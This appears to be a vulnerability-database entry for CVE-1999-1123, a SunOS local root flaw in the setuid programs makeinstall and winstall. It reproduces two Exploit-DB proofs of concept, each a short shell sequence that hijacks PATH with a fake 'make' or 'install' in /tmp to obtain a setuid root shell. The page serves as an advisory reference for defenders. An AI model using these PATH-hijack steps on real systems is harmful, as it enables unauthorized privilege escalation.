CVE-1999-1123
published 1991-05-20CVE-1999-1123: The installation of Sun Source (sunsrc) tapes allows local users to gain root privileges via setuid root programs (1) makeinstall or (2) winstall.
PriorityP426high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.13%
62.2th percentile
The installation of Sun Source (sunsrc) tapes allows local users to gain root privileges via setuid root programs (1) makeinstall or (2) winstall.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sun | sunos | — | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SunOS 4.1.1 - '/usr/release/bin/makeinstall' Local Privilege Escalation
exploitdb·1999-11-23
CVE-1999-1123 SunOS 4.1.1 - '/usr/release/bin/makeinstall' Local Privilege Escalation
SunOS 4.1.1 - '/usr/release/bin/makeinstall' Local Privilege Escalation
---
source: https://www.securityfocus.com/bid/21/info
This applies to sites that have installed Sun Source tapes
only.
The Sun distribution of sources (sunsrc) has an installation
procedure which creates the directory /usr/release/bin and
installs two setuid root files in it: makeinstall and winstall.
These are both binary files which exec other programs:
"make -k install" (makeinstall) or "install" (winstall) without
a full path or reseting the PATH enviroment variable.
This makes it possible for users on that system to become root.
$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/make
$ chmod a+rx /tmp/make
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/makeinstall
$ /tmp/sh
#
Exploit-DB
SunOS 4.1.1 - '/usr/release/bin/winstall' Local Privilege Escalation
exploitdb·1999-11-12
CVE-1999-1123 SunOS 4.1.1 - '/usr/release/bin/winstall' Local Privilege Escalation
SunOS 4.1.1 - '/usr/release/bin/winstall' Local Privilege Escalation
---
source: https://www.securityfocus.com/bid/22/info
This applies to sites that have installed Sun Source tapes only.
The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable.
This makes it possible for users on that system to become root.
$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/install
$ chmod a+rx /tmp/install
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/winstall
$ /tmp/sh
#
No writeups or analysis indexed.
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/107&type=0&nav=sec.sbahttp://www.cert.org/advisories/CA-1991-07.htmlhttp://www.securityfocus.com/bid/21http://www.securityfocus.com/bid/22https://exchange.xforce.ibmcloud.com/vulnerabilities/582http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/107&type=0&nav=sec.sbahttp://www.cert.org/advisories/CA-1991-07.htmlhttp://www.securityfocus.com/bid/21http://www.securityfocus.com/bid/22https://exchange.xforce.ibmcloud.com/vulnerabilities/582
1991-05-20
Published